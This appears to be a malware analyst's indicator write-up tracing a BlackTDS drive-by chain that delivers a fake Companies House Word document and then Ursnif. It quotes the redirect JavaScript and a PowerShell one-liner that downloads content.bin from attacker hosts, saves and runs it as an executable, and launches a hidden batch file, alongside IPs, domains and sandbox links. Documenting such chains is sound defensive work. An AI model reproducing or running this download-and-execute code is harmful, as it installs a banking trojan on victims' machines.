[BlackTDS Driveby Maldoc leads to Ursnif]

[Maldoc - B1F7B208ACA0DE0CC28B547CD73EE980]
https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4

[Payload - 8cac839accda5f125d5f5d7226e4db92]
https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c

[BlackTDS]

celsiumoftesla.cf GET / HTTP/1.1
94.23.47.105 GET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1

[BlackTDS JavaScript]

<style> html, body { margin: 0; padding: 0; height : 100%; } </style>
<script type="text/javascript">
document.write('\<script type=\'text/javascript\'>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script>');
</script>
<iframe src="" style="display:block; width:100%; height:100%; border:none; margin:0; padding:0;"></iframe><span style="visibility: hidden"><a href="/insert">j2B7wKaXk658V</a><a href="/register">3xfgzc1roc</a></span>

[Maldoc - fake Companies House]

94.23.47.105 OPTIONS /documents/ HTTP/1.1
94.23.47.105 OPTIONS /documents/ HTTP/1.1
94.23.47.105 OPTIONS /documents/ HTTP/1.1
94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1
94.23.47.105 OPTIONS / HTTP/1.1
94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1
94.23.55.137 GET /docs/content.bin HTTP/1.1

http://allhealthsol.com/data/content.bin

[Maldoc PowerShell]

PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden"

[Ursnif Rjdeoo.exe]

https://86.105.18.236/index.html